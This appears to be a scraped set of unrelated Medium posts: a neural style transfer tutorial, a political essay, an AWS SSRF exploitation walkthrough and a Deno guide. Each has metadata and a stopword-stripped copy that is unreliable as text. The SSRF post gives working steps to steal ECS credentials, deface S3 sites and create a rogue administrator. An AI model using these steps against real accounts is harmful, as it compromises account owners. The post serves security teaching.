One of the most exciting applications of Deep Learning is Neural Style Transfer. Through this article, we will understand Neural Style Transfer and implement our own Neural Style Transfer algorithm using a pre-trained Convnet Deep Learning Model. Let's get started and understand what neural style transfer is! Neural style transfer is an optimization technique used to take two images, a content image & a style reference image (such as an artwork by a famous painter) and blend them together so the output image looks like the content image, but "painted" in the style of the style reference image. In neural style transfer terminology, there are 3 images. The image which needs to be painted is known as the Content image. The style in which the content image will be drawn is the Style image. And there will be one output image generated by the combination of these two content and style images, and the technique used here is known as Neural Style Transfer. Neural Style Transfer allows us to generate a new image like the one below by combining the content image and the style image. In other words, we can say that one image (the Content image) is drawn in the style of another image (the Style image) to produce a new image. Source: LinkedIn Here we generated the new image on the right by combining the content of the Mona Lisa image on the left and the style image in the middle using the Neural Style Transfer algorithm. Transfer Learning Neural Style Transfer (NST) uses a previously trained convolutional network, and builds on top of that. The idea of using a network trained on a different task and applying it to a new task is called transfer learning. Following the original NST paper, we will use the VGG network. Specifically, we'll use VGG-19, a 19-layer version of the VGG network. This model has already been trained on the very large ImageNet database, and thus has learned to recognize a variety of low level features (at the shallower layers) and high level features (at the deeper layers). Neural Style Transfer To see how well our algorithm generates the output image from the content image drawn in the style of the style image, we will build the Neural Style Transfer (NST) algorithm in three steps: Build the content cost function, Jcontent(C,G) Build the style cost function, Jstyle(S,G) Put them together to get the total cost function J(G) = α Jcontent(C,G) + β Jstyle(S,G), where α and β are hyperparameters. Cost Function We have a content image C and a style image S, and our goal is to generate a new image G. In order to implement neural style transfer, we will define a cost function J(G) that measures how well our algorithm is producing the output image, and we'll use gradient descent to minimize J(G) in order to get the desired output. This cost function will have two components. 1. The first component is called the content cost. This is a function of the content image and of the generated image, and it measures how similar the content of the generated image is to the content of the content image C. 2. The second component is the style cost, which is a function of S and G, and it measures how similar the style of the image G is to the style of the image S. The overall cost function is defined as follows:- Here α and β are hyperparameters to specify the relative weighting between the content cost and the style cost. The algorithm runs as follows:- 1. Initialize the generated image G randomly, say 100*100*3 or 500*500*3 or whatever dimension we want it to be. 2.
Use gradient descent to minimize the cost function defined above, and we will update G as:- Here we are actually updating the pixel values of this image G. As we run gradient descent, we minimize the cost function J(G) slowly through the pixel values, so we gradually get an image that looks more and more like our content image rendered in the style of our style image. Computing the content cost (Jcontent(C,G)) Through this content cost function, we will determine how similar the generated image is to the content image. We would like the "generated" image G to have similar content to the input image C. It is advised to choose a layer in the middle of the network — neither too shallow nor too deep, as shallow layers tend to detect lower-level features such as edges and simple textures and deep layers tend to detect higher-level features such as more complex textures as well as object classes. We will find the activations for both the content image C and the generated image G by setting each image in turn as the input to the pretrained VGG network and running forward propagation. The content cost function is defined as follows:- Here nH, nW and nC are the height, width and number of channels of the hidden layer we have chosen, and they appear in a normalization term in the cost. a(C) and a(G) are the 3D volumes corresponding to a hidden layer's activations. Computing the style cost (Jstyle(S,G)) First, let us understand what is meant by style here. Style can be defined as the correlation between activations across different channels in the layer L activation. Before moving on to calculate the style cost, we need to understand one term: the Gram matrix. We also call it the style matrix. In linear algebra, the Gram matrix G of a set of vectors (v1,…,vn) is the matrix of dot products, whose entries are Gij=np.dot(vi,vj). In other words, Gij compares how similar vi is to vj: If they are highly similar, you would expect them to have a large dot product, and thus for Gij to be large. In Neural Style Transfer (NST), you can compute the Style matrix by multiplying the "unrolled" filter matrix with its transpose. The result is a matrix of dimension (nC,nC) where nC is the number of filters (channels). The value G(gram)i,j measures how similar the activations of filter i are to the activations of filter j. Now we understand the Gram matrix and know that the style of an image can be represented using the Gram matrix of a hidden layer's activations. Our goal will be to minimize the distance between the Gram matrix of the "style" image S and the Gram matrix of the "generated" image G. The corresponding style cost for a single layer l is defined as: G gram(S): Gram matrix of the "style" image. G gram(G): Gram matrix of the "generated" image. Remember, this cost is computed using the activations for a single particular hidden layer in the network. We get even better results by combining this representation from multiple different layers. This is in contrast to the content representation, where usually using just a single hidden layer is sufficient. Minimizing the style cost will cause the image G to follow the style of the image S.
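To make the two cost functions more concrete, here is a short TensorFlow sketch of the Gram matrix, the content cost and the per-layer style cost. It is a minimal sketch rather than the implementation from the author's repo; the activations are assumed to be single (nH, nW, nC) tensors, and the 1/(4·nH·nW·nC) and 1/(4·nC²·(nH·nW)²) normalization constants follow the commonly used NST formulation referred to in the text.

import tensorflow as tf

def gram_matrix(a, n_H, n_W, n_C):
    # Unroll the (n_H, n_W, n_C) activation volume into an (n_C, n_H*n_W) matrix,
    # then multiply it by its transpose to get the (n_C, n_C) style/Gram matrix.
    a_unrolled = tf.reshape(tf.transpose(a, perm=[2, 0, 1]), [n_C, n_H * n_W])
    return tf.matmul(a_unrolled, tf.transpose(a_unrolled))

def content_cost(a_C, a_G, n_H, n_W, n_C):
    # J_content = sum((a_C - a_G)^2) / (4 * n_H * n_W * n_C)
    return tf.reduce_sum(tf.square(a_C - a_G)) / (4 * n_H * n_W * n_C)

def style_cost_layer(a_S, a_G, n_H, n_W, n_C):
    # J_style_layer = sum((G_S - G_G)^2) / (4 * n_C^2 * (n_H * n_W)^2)
    G_S = gram_matrix(a_S, n_H, n_W, n_C)
    G_G = gram_matrix(a_G, n_H, n_W, n_C)
    return tf.reduce_sum(tf.square(G_S - G_G)) / (4 * (n_C ** 2) * ((n_H * n_W) ** 2))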
Optimizing Total Cost Function Now that we have calculated both the content cost function and the style cost function, our goal will be to optimize the total cost function using gradient descent, so that the generated image is created from the content image but drawn in the style of the style image. Implementation Now we understand the concepts of the Neural Style Transfer algorithm. Finally, let's put everything together to implement Neural Style Transfer using the TensorFlow Deep Learning Framework and the pretrained VGG-19 model. Here's what the program is doing: 1. Create an Interactive Session 2. Load the content image 3. Load the style image 4. Randomly initialize the image to be generated 5. Load the VGG19 model 6. Build the TensorFlow graph i) Run the content image through the VGG19 model and compute the content cost ii) Run the style image through the VGG19 model and compute the style cost iii) Compute the total cost iv) Define the optimizer and the learning rate 7. Initialize the TensorFlow graph and run it for a large number of iterations, updating the generated image at every step. Output of NST Algorithm:- In our example, the content image C is a picture of the Louvre Museum in Paris. Content Image Following is the style image: Style Image And the output generated image produced by our NST algorithm:- Neural Style Transfer Note: For code implementation and better understanding, kindly visit my github repo. I hope this helps! Thanks for reading. Any feedback/suggestions will be highly appreciated.
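As a quick postscript to the steps above, the toy loop below shows the total-cost optimization in a self-contained way. It reuses the two cost functions from the earlier sketch but replaces real VGG-19 activations with random tensors, so gradient descent simply drives J(G) = α·Jcontent + β·Jstyle down. The weights α = 10 and β = 40 and the optimizer settings are illustrative assumptions, not values from the author's repo.

import tensorflow as tf

n_H, n_W, n_C = 16, 16, 8
a_C = tf.random.normal([n_H, n_W, n_C])                # stand-in "content" activations
a_S = tf.random.normal([n_H, n_W, n_C])                # stand-in "style" activations
a_G = tf.Variable(tf.random.normal([n_H, n_W, n_C]))   # the tensor we optimize

alpha, beta = 10.0, 40.0
optimizer = tf.optimizers.Adam(learning_rate=0.05)

for step in range(200):
    with tf.GradientTape() as tape:
        J = (alpha * content_cost(a_C, a_G, n_H, n_W, n_C)
             + beta * style_cost_layer(a_S, a_G, n_H, n_W, n_C))
    # One gradient-descent update on the "generated" activations.
    optimizer.apply_gradients([(tape.gradient(J, a_G), a_G)])

print("final total cost:", float(J))   # noticeably lower than at step 0

In the real algorithm the optimized variable is the generated image itself and the activations come from the chosen VGG-19 layers, but the update step follows exactly this pattern.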
https://krsanu555.medium.com/deep-learning-applications-neural-style-transfer-6f5bcb9df8d0
['Kumar Sanu']
2020-11-29 18:42:36.828000+00:00
['Convolutional Network', 'Deep Learning', 'AI', 'Computer Vision', 'Neural Style Transfer']
Title Deep Learning Applications Neural Style TransferContent One exciting application Deep Learning Neural Style Transfer article understand Neural Style Transfer implement Neural Style Transfer Algorithm using pretrained Convnet Deep Learning Model Let’s get started understand neural style transfer Neural style transfer optimization technique used take two image content image style reference image artwork famous painter blend together output image look like content image “painted” style style reference image neural style transfer terminology 3 image image need painted known Content image style content image drawn Style image one output image generated combination two content style image technique used known Neural Style Transfer Neural Style Transfer allows u generate new image like one combining content image style image word say one image Content image drawn style another imageStyle image produce new image Source LinkedIn generated new image right combining content Mona Lisa image left style image middle using Neural Style Transfer Algorithm Transfer Learning Neural Style Transfer NST us previously trained convolutional network build top idea using network trained different task applying new task called transfer learning Following original NST paper use VGG network Specifically we’ll use VGG19 19layer version VGG network model already trained large ImageNet database thus learned recognize variety low level feature shallower layer high level feature deeper layer Neural Style Transfer see well algorithm generating output image content image drawn style style image build Neural Style Transfer NST algorithm three step Build content cost function JcontentCG Build style cost function JstyleSG Put together get total cost function JGα JcontentCGβ JstyleSG α β hyperparameters Cost Function content image C given style image goal generate new image G order implement neural style transfer define cost function JG measure well algorithm producing output image we’ll use gradient descent minimize J G order get desired output cost function function two component 1 first component called content cost function content image generated image measure similar content generated image content content image C 2 second component style cost function SG measure similar style image G style image overall cost function defined follows α β hyperparameters specify relative weighting content cost style cost algorithm run follows Initialize generated image G randomly say 100100 3 500500 3 whatever dimension want 2 Use gradient descent minimize cost function defined update G actually updating pixel value image G run gradient descent minimize cost function JG slowly pixel value get slowly image look like content image rendered style style image Computing content cost JcontentCG content cost function determine generated image similar content image would like make “generated” image G similar content input image C advised choose layer middle network — neither shallow deep shallow layer tend detect lowerlevel feature edge simple texture deep layer tend detect higherlevel feature complex texture well object class find activation content image C generated image G setting image one one input pretrained VGG network run forward propagation contest cost function defined follows nH nW nC height width number channel hidden layer chosen appear normalization term cost height width number channel hidden layer chosen appear normalization term cost aC aG 3D volume corresponding hidden layer’s activation Computing style cost JstyleSG First 
know meant style Style defined correlation activation across different channel layer L activation moving calculate style cost need understand one term Gram matrix also call style matrix linear algebra Gram matrix G set vector v1…vn matrix dot product whose entry Gijnpdotvivj word Gij compare similar vi vj highly similar would expect large dot product thus Gij large Neural Style Transfer NST compute Style matrix multiplying “unrolled” filter matrix transpose result matrix dimension nCnC nC number filter channel value Ggramij measure similar activation filter activation filter j understand gram matrix got know style image represented using Gram matrix hidden layer’s activation goal minimize distance Gram matrix “style” image gram matrix “generated” image G corresponding style cost single layer l defined G gramS Gram matrix “style” image Gram matrix “style” image G gramG Gram matrix “generated” image Remember cost computed using activation single particular hidden layer network get even better result combining representation multiple different layer contrast content representation usually using single hidden layer sufficient Minimizing style cost cause image G follow style image Optimizing Total Cost Function calculated content cost function style cost function goal optimize total cost function using gradient descent generated image created content image drawn style image style image Implementation understand concept Neural Style Transfer Algorithm Finally let’s put everything together implement Neural Style Transfer using TensorFlow Deep Learning Framework pretrained VGG19 model Here’s program Create Interactive Session 2 Load content image 3 Load style image 4 Randomly initialize image generated 5 Load VGG19 model 6 Build TensorFlow graph Run content image VGG19 model compute content cost ii Run style image VGG19 model compute style cost iii Compute total cost iv Define optimizer learning rate 7 Initialize TensorFlow graph run large number iteration updating generated image every step Output NST Algorithm example content image C picture Louvre Museum Paris Content Image Following style image Style Image output generated image produced NST algorithm Neural Style Transfer Note code implementation better understanding kindly visit github repo hope help Thanks reading feedbackssuggestions highly appreciatedTags Convolutional Network Deep Learning AI Computer Vision Neural Style Transfer
3,880
The Left Has a Self-Righteousness Problem
But that fact is misleading — especially since the Democratic Party used to be the party of slavery. Andrew Jackson winning the popular vote in 1824 but losing the presidency in the House of Representatives was undoubtedly a progressive victory, as Jackson is a president with one of the worst track records on slavery and Native Americans. When Democrat Samuel Tilden defeated Republican Rutherford B. Hayes in the popular vote by more than 200,000 votes, but lost in the Electoral College, the Democrats came to a compromise — they would pull federal troops out of the South and end Reconstruction, but the more progressive Republicans would hold the executive branch. While that sounds like a terrible compromise, think about what might have happened had Tilden won or had Jackson won. It's tough to think about hypotheticals, but would the country have been a better place if Democrats won in the 19th century? Getting rid of the Electoral College requires a constitutional amendment. It requires a two-thirds vote in the Senate, and a two-thirds vote in the House. It requires ratification by three-fourths of the states. If Trump won 26 out of 50 states, there is no chance Republicans will be on board to overturn an electoral system that favors them any time in the near future. And changing the Electoral College to a popular vote is like changing the sport you're playing — why would any candidate campaign in rural Ohio or Michigan if the popular vote was all that mattered? If a political candidate wanted to be strategic with their time, why wouldn't they campaign in New York, Los Angeles, Chicago, Boston, and San Francisco all the time? According to Jacob Levy, a professor at McGill University: "The game will not be any longer to be a [politician who is] liberal but be able to appeal to a rural Ohioan…The game will be: Be a liberal — to the extent I can maximize votes in major urban centers." Of course, deceptive branding isn't the answer either. As the Democratic Party grapples with its identity, the dreaded word of compromise is reality — and ideological purity is the dream. I would love major police reform, universal health care, and not separating children and their parents at the borders too. But are we worried about people agreeing with our slogans, or are we worried about actually strategically passing that legislation? And the problem now is self-righteousness because it's clear that the gap isn't as racial as it used to be. It's educational — liberals are simply not connecting as they used to with non-college-educated voters. The media might not have a liberal bias explicitly, but an education bias is shown to tilt liberal. The condescension has gone too far, belittling not only the white working class but the working class of all races. That is shown by the shifting tide of the 2020 election across all demographics. If the Democratic Party still wants to hold onto the claim of being the "party of the people," then shifting towards being the party of the educated is antithetical to that dream. The answer we should seek, then, is not to push center or push left, but to do a deep examination of the way we brand and the way we speak. Automatically dismissing and disparaging anyone who disagrees with us makes us feel good about ourselves in our echo chambers, but it's not winning more voters where it matters. I know a lot of people who agree with me in my city, but those aren't the opinions that are winning votes where it matters. In the words of Lisa Lerer at the New York Times:
https://medium.com/the-apeiron-blog/the-left-has-a-self-righteousness-problem-1f520c233143
['Ryan Fan']
2020-12-29 21:07:32.199000+00:00
['Politics', 'Race', 'Nonfiction', 'Society', 'Election 2020']
Title Left SelfRighteousness ProblemContent fact misleading — especially since Democratic Party used party slavery Andrew Jackson winning popular vote 1824 losing electoral vote House Representatives undoubtedly progressive victory Jackson president one worst track record slavery Native Americans Democrat Samuel Tilden defeated Republican Rutherford B Hayes popular vote 200000 vote lost Electoral College Democrats came compromise — would pull federal troop South end Reconstruction progressive Republicans would hold executive branch sound like terrible compromise think might happened Tilden Jackson It’s tough think hypothetical would country better place Democrats 19th century get rid Electoral College requires constitutional amendment requires twothirds vote Senate twothirds vote House requires threefourths vote state Trump 26 50 state chance Republicans board overturn electoral system favor time near future changing Electoral College popular vote like changing sport you’re playing — would candidate campaign rural Ohio Michigan popular vote mattered political candidate wanted strategic time wouldn’t campaign New York Los Angeles Chicago Boston San Francisco time According Jacob Levy professor McGill University “The game longer politician liberal able appeal rural Ohioan…The game liberal — extent maximize vote major urban centers” course deceptive branding isn’t answer either Democratic Party grapple identity dreaded word compromise reality — ideological purity dream would love major police reform universal health care separating child parent border worried people agreeing slogan worried actually strategically passing legislation problem selfrighteousness it’s clear gap isn’t racial used It’s educational — liberal simply connecting used noncollegeeducated voter medium might liberal bias explicitly education bias shown tilt liberal condescension gone far belittling white working class working class race shown shifting tide 2020 election across demographic Democratic Party still want hold onto claim “party people” shifting towards party educated antithetical dream answer seek push center push left deep examination way brand way speak Automatically dismissing disparaging anyone disagrees u make u feel good echo chamber it’s winning voter matter know lot people agree city aren’t opinion winning vote matter word Lisa Lerer New York TimesTags Politics Race Nonfiction Society Election 2020
3,881
Privilege escalation in the Cloud: From SSRF to Global Account Administrator
In my previous stories, I explored different techniques for exploiting Server-Side Request Forgeries (SSRF), which can lead to unauthorized access to various resources within the internal network of a Web server. In some circumstances, SSRFs can even lead to API keys or database credentials getting compromised. In this story, I wish to show you that in the context of a Cloud application, the consequences of a successful attack that uses this technique are on a whole different scale. An attacker that can effectively leverage an SSRF on the right resource could gain complete access to one's AWS account, and the only limit to what you can do from there is your imagination. Spin up a couple of c5.xlarge instances to harvest Bitcoins? Host a malware delivery network over S3? Your choice… The DVCA Lab Environment For this experiment, I have developed the DVCA (Damn Vulnerable Cloud Application), which is available on GitHub and has been inspired by the Damn Vulnerable Web Application project. DO NOT deploy this in your environment if you haven't hardened it by restricting security groups to your own IP and/or changing the IAM Roles given in the project. At the moment of writing, it is made of a static S3-hosted website delivered over SSL by CloudFront. You can choose whether you want a serverless backend using an API Gateway and a Lambda function, an ECS Fargate backend running a Flask container or a Classic EC2 backend running this same container. For the purpose of this article, I will concentrate on the Fargate backend. The Damn Vulnerable Cloud Application architecture From the outside, it all seems fine: HTTPS is active on both the frontend and the backends, and the website is static and therefore protected from classic attacks like SQL Injections or Wordpress plugin vulnerabilities… The DVCA interface The SSRF is done through a Webhook tester, like in my first story about the subject. All backends are coded the same way: they receive a URL, read it using urllib and return the result to the frontend, which displays it in the "debugger" frame. Roles and Permissions in AWS EC2/ECS In order to assume a role and effectively gain permissions relative to AWS resources, you will need three pieces of information: an AccessKey, a SecretKey, and a SessionToken, in the case that the credentials were issued by the Security Token Service (STS). In an EC2 or ECS infrastructure, each VM/Task can have a particular set of permissions; for example, if your Web application needs to upload files to an S3 Bucket, you will need to assign it the s3:PutObject permission over the bucket. This means that our Fargate containers also need to get credentials from STS in order to do their job, if it implies calling AWS resources. In a classic EC2 scenario, the credentials for a particular instance can be fetched by the EC2 instance (and only from there, since the endpoint is not public) from the Metadata URL: http://169.254.169.254/latest/meta-data/iam/security-credentials/ . Note that you can also fetch quite a lot of sensitive information from this IP, like UserData scripts that are likely to contain API keys and other secrets. In the case of an ECS Task, the credentials can be retrieved from a different endpoint: http://169.254.170.2/v2/credentials/<SOME_UUID> . The UUID in question can be found in the environment variables of the container, more specifically the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable.
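In script form, chaining these two lookups through the SSRF looks roughly like the sketch below (the next section walks through the same steps one by one). This is an attacker-side helper, not code from the DVCA repo: the vulnerable webhook endpoint path and its JSON parameter name are assumptions made for illustration and depend on how you deployed the lab, while the credential field names follow the usual ECS task credentials response.

import json
import requests

# Hypothetical vulnerable webhook-tester endpoint exposed by the DVCA backend.
BACKEND = "https://dvca.example.com/api/webhook"

def ssrf_fetch(url):
    # Ask the vulnerable backend to fetch `url` on our behalf and echo the body back.
    resp = requests.post(BACKEND, json={"url": url}, timeout=10)
    resp.raise_for_status()
    return resp.text

# Step 1: read the container's environment to find the credentials path.
environ = ssrf_fetch("file:///proc/self/environ")
env = dict(pair.split("=", 1) for pair in environ.split("\x00") if "=" in pair)
relative_uri = env["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]

# Step 2: fetch the temporary STS credentials from the ECS credentials endpoint.
creds = json.loads(ssrf_fetch("http://169.254.170.2" + relative_uri))
print(creds["AccessKeyId"], creds["SecretAccessKey"], creds["Token"])

From here, the three values can be fed straight into boto3, as the following sections demonstrate.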
Abusing the IAM Services through SSRFs Since the STS service is available through normal HTTP endpoints, we can trick the Fargate backend into making arbitrary requests to these endpoints, and the Frontend will happily display the result to us. But how could we find the credentials UUID needed for the request? Well, in my other SSRF story, I showed that you can read a file using the file:// scheme. So assuming the backend is a Linux-based server, you can read the environment variables by pointing your request to file:///proc/self/environ . The relative URL for retrieving the credentials, including the UUID, can be found in /proc/self/environ Yay! Now, we can use this URI to retrieve credentials: Credentials retrieved from an SSRF request Using the credentials In order to use these credentials in a creative manner, I would suggest using boto3 , the Python SDK for interacting with the AWS API. Upon creating the boto3 client object, the constructor accepts credentials as parameters, so we can pass it those received from our SSRF: sts_client = boto3.client( 'sts', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) Now, to be sure that our credentials work and that we have effectively elevated privileges, the STS service has an AWS equivalent to the whoami command: get-caller-identity . Let's verify: > print(sts_client.get_caller_identity()['Arn']) > arn:aws:sts::0123456789:assumed-role/DVCA-Fargate-Backend-DVCATaskRole-CLOUDFORMATION_ID/SOME_UUID Bingo! Now my laptop is considered by AWS to be the Fargate backend of my application, meaning I have access to everything it has access to. Regarding S3, for example, the backend ECS Task has this set of permissions defined: - Effect: Allow Action: - s3:GetObject - s3:PutObject - s3:ListBucket Resource: '*' # Tip: Try to never wildcard access to resources Now, if the domain name of the DVCA is a "root" domain (that has no subdomain), chances are that the underlying S3 Bucket name is the same as the domain name, because of the way Route53 Alias Records make it just easier to work this way. We can use this to modify the static website and inject a rogue mining script in it (for example), effectively defacing the static S3 website! s3_client = boto3.client( 's3', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) s3_client.put_object(Body=rogue_bytes, Bucket='domain.name', Key='index.html') Also note the s3:ListBucket permission, which also enables the serverless equivalent of directory listing… Taking over Let's say your Web Application has the right to create roles (a role for each customer, for example) and that this permission was implemented as - Effect: Allow Action: - iam:* # Living dangerously Resource: '*' (Very dangerous, but I am sure there are plenty of way too permissive implementations of this in the wild) for the sake of simplicity.
Using the credentials retrieved through our SSRF technique and passing them to boto3, we are able to create a new Global Administrator user and create Access Keys for him in just a few lines of Python: iam_client = boto3.client( 'iam', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) iam_client.create_user( UserName='DVCA-RogueUser' ) iam_client.attach_user_policy( PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess', UserName='DVCA-RogueUser', ) key_response = iam_client.create_access_key(UserName='DVCA-RogueUser') In this example, the keys will be in the key_response object, which you can just print out. At this point, you won. You basically own everything in this account. A rogue administrator user created using the backend's credentials Future work: The Lambda Backend Even though I included a serverless Lambda backend in DVCA, I have not been able to exploit it yet. In this case, the credentials are injected directly into Python's os.environ , but are not part of /proc/self/environ or /proc/self/task/1/environ . I know that they are injected at bootstrap using lambda_runtime.receive_start() , but I am not sure they are anywhere to be found on the filesystem. AWS Lambdas also do not have a metadata endpoint from which we could fetch them. My next hypothesis would be to try to retrieve them from memory, by looking at /proc/self/map* files. So if you have an idea, drop a comment below! Happy hacking! :-)
https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6
['Maxime Leblanc']
2018-09-01 13:01:01.509000+00:00
['Information Security', 'Hacking', 'AWS', 'Cloud Computing', 'Cloudformation']
Title Privilege escalation Cloud SSRF Global Account AdministratorContent previous story explored different technique exploiting ServerSide Request Forgeries SSRF lead unauthorized access various resource within internal network Web server circumstance SSRFs event lead API key database credential getting compromised story wish show context Cloud application consequence successful attack us technique decoupled attacker effectively leverage SSRF right resource could gain complete access one’s AWS account limit bound imagination Spin couple c5xlarge harvest Bitcoins Host malware delivery network S3 choice… DVCA Lab Environment experiment developed DVCA Damn Vulnerable Cloud Application available GitHub inspired Damn Vulnerable Web Application project deploy environment haven’t hardened restraining security group IP andor change IAM Roles given project moment writing made static S3hosted website delivered SSL CloudFront choose wether want serverless backend using API Gateway Lambda function ECS Fargate backend running Flask container Classic EC2 backend running container purpose article concentrate Fargate backend Damn Vulnerable Cloud Application architecture outside seems fair HTTPS active frontend backends website static therefore protected classic attack like SQL Injections Wordpress plugin vulnerabilities… DVCA interface SSRF done Webhook tester like first story subject backends coded way receive URL read using urllib return result frontend display “debugger” frame Roles Permissions AWS EC2ECS order assume role effectively gain permission relative AWS resource need three piece information AccessKey SecretKey SessionToken case credential issued Security Token Service STS EC2 ECS infrastructure VMTask particular set permission example Web application need upload file S3 Bucket need assign s3PutObject permission bucket mean Fargate container also need get credential STS order job implies calling AWS resource classic EC2 scenario credential particular instance fetched EC2 instance since endpoint public Metadata URL http169254169254latestmetadataiamsecuritycredentials Note also fetch quite lot sensitive information IP like UserData script likely contain API key secret case ECS Task credential retrieved different endpoint http1692541702v2credentialsSOMEUUID UUID question found environment variable container specifically AWSCONTAINERCREDENTIALSRELATIVEURI variable Abusing IAM Services SSRFs Since STS service available normal HTTP endpoint trick Fargate backend making arbitrary request endpoint Frontend happily display result u couldwe find credential UUID needed request Well SSRF story showed read file using file scheme assuming backend Linuxbased server read environment variable pointing request fileprocselfenviron relative URL retrieving credential including UUID found procselfenviron Yay use URI retrieve credential Credentials retrieved SSRF request Using credential order use credential creative manner would suggest use boto3 Python SDK interacting AWS Api Upon creating boto3 client object constructor accepts credential parameter pas received SSRF stsclient boto3client sts awsaccesskeyidaccesskey awssecretaccesskeysecretkey awssessiontokensessiontoken sure credential work effectively elevated privilege STS service AWS equivalent whoami command getcalleridentity Let’s verify printstsclientgetcalleridentityArn arnawssts0123456789assumedroleDVCAFargateBackendDVCATaskRoleCLOUDFORMATIONIDSOMEUUID Bingo laptop considered AWS like Fargate backend application meaning access everything access 
Reagarding S3 example backend ECS Task set permission defined Effect Allow Action s3GetObject s3PutObject s3ListBucket Resource Tip Try never wildcard access resource domain name DVCA “root” domain subdomain chance underlying S3 Bucket name domain name way Route53 Alias Records make easier work way use modify static website inject rogue mining script example effectively defacing static S3 website s3client boto3client s3 awsaccesskeyidaccesskey awssecretaccesskeysecretkey awssessiontokensessiontoken s3clientputobjectBodyroguebytes Bucketdomainname Keyindexhtml Also note s3ListBucket permission also enables serverless equivalent directory listing… Taking Let’s say Web Application right create role role customer example permission implemented Effect Allow Action iam Living dangerously Resource dangerous sure plenty way permissive implementation wild sake simplicity Using credential retrieved SSRF technique passing boto3 able create new Global Administrator user create Access Keys line python iamclient boto3client iam awsaccesskeyidaccesskey awssecretaccesskeysecretkey awssessiontokensessiontoken iamclientcreateuser UserNameDVCARogueUser iamclientattachuserpolicy PolicyArnarnawsiamawspolicyAdministratorAccess UserNameDVCARogueUser keyresponse iamclientcreateaccesskeyUserNameDVCARogueUser example key keyresponse object printout point basically everything account rogue administrator user created using backend’s credential Future work Lambda Backend Even though included serverless Lambda backend DVCA able exploit yet case credential injected directly Pythons osenviron part procselfenviron procselftask1environ know injected bootstrap using lambdaruntimereceivestart sure anywhere found filesystem AWS Lambdas also metadata endpoint could fetch next hypothesis would try retrieve memory looking procselfmap file idea drop comment Happy hacking Tags Information Security Hacking AWS Cloud Computing Cloudformation
3,882
Using node modules in Deno
Photo by frank mckenna on Unsplash Using node modules in Deno A bad practice but sometimes there is no alternative. Last time we introduced Deno and discussed how it compares to node. Like node, Deno is a server side code-execution environment based on web technology. Node uses JavaScript with commonjs modules and npm/yarn as its package manager. Deno uses Typescript or JavaScript with modern javascript import statements. It does not need a package manager. To import a module as usual in deno you reference it by URL: import { serve } from "https://deno.land/std/http/server.ts"; You can find many of the modules you may need in the Deno standard library or in the Deno third party modules list, but they don't have everything. Sometimes you need to use a module which the maintainers have only made available through the npm ecosystem. Here are some methods, from most convenient to least: 1. If the module already uses ES modules import/export syntax. The libraries you use from deno don't have to come from the recommended Deno packages; they can come from any URL, provided they use the modern import syntax. Using unpkg is a great way to access these files directly from inside an npm repo. import throttle from "https://unpkg.com/lodash@4.17.19/throttle.js" 2. If the module itself doesn't use imports but the source code does If the module is compiled or in the wrong format through npm you may still have some luck if you take a look at the source code. Many popular libraries have moved away from using commonjs in their source code to the standards compliant es module import syntax. Some packages have a separate src/ and dist/ directory where the esmodule style code is in src/ which isn't included in the package available through npm. In that case you can import from the source directly. import throttle from "https://raw.githubusercontent.com/lodash/lodash/master/throttle.js"; I got this URL by clicking on the "raw" button on github to get the raw JS file. It's probably neater to use a github cdn or to see if the file is available through github pages, but this works. NB: Some libraries use esmodules with webpack, or a module loader which lets them import from node modules like this: Bad: import { someFunction } from "modulename"; import { someOtherFunction } from "modulename/file.js"; The standard for imports is that they need to start with ./ or be a URL to work. Good: import { someOtherFunction } from "./folder/file.js"; In that situation try the next method: 3. Importing commonjs modules Fortunately there is a service called JSPM which will resolve the 3rd party modules and compile the commonjs modules to work as esmodule imports. This tool is for using node modules in the browser without a build step. But we can use it here too. The JSPM logo In my most recent project I wanted to do push notifications, which involves generating the credentials for VAPID. There is a deno crypto library which can do encryption, but doing the full procedure is difficult and I'd rather use the popular web-push library. I can import it using the JSPM CDN with a URL like the one below: import webPush from "https://dev.jspm.io/web-push"; I can now use it like any other module in deno. This almost worked 100%; some of the bits which relied on specific node behaviors, such as making network requests, failed. In this situation I had to work around this by using the standardised fetch API deno uses.
Getting Typescript types working One nice feature of Typescript, which deno uses, is that it provides really good autocomplete for modules. The deno extension for my editor can even autocomplete for third party modules if it knows the type definitions. This isn't essential to getting the code to work but can provide huge benefits for helping you maintain your code. When I was importing another module called fast-xml-parser, I was looking through the source code and noticed it had a type definitions file, which is a file which ends in .d.ts . These files describe the various interfaces and even work for JavaScript .js files. You can sometimes also find the type definition files in the @types/somemodule repo. Using this file, typescript can auto complete on things imported from JavaScript files. Even for files imported using JSPM: // Import the fast-xml-parser library import fastXMLParser from "https://dev.jspm.io/fast-xml-parser"; // Import the type definition file from the source code of fast-xml-parser import * as FastXMLParser from "https://raw.githubusercontent.com/NaturalIntelligence/fast-xml-parser/master/src/parser.d.ts"; // Use the parser with the types const parser = fastXMLParser as typeof FastXMLParser; I import the type definitions from the definition files as FastXMLParser (note the uppercase F); this doesn't contain any working code but is an object which has the same type as the code we want to import. I import the code from JSPM as fastXMLParser (lowercase f), which is the working code but has no types. Next I combine them together to make parser , which is fastXMLParser with the type of FastXMLParser . Thank you for reading, I hope you give deno a go. The ability to use any module made for the web and even some which were made for node/npm really gives this new server side library ecosystem a good foundation to get started from. 🦕
https://medium.com/samsung-internet-dev/using-node-modules-in-deno-2885600ed7a9
['Ada Rose Cannon']
2020-08-03 12:14:52.404000+00:00
['Deno', 'Nodejs', 'JavaScript', 'Samsung Internet', 'Web Development']
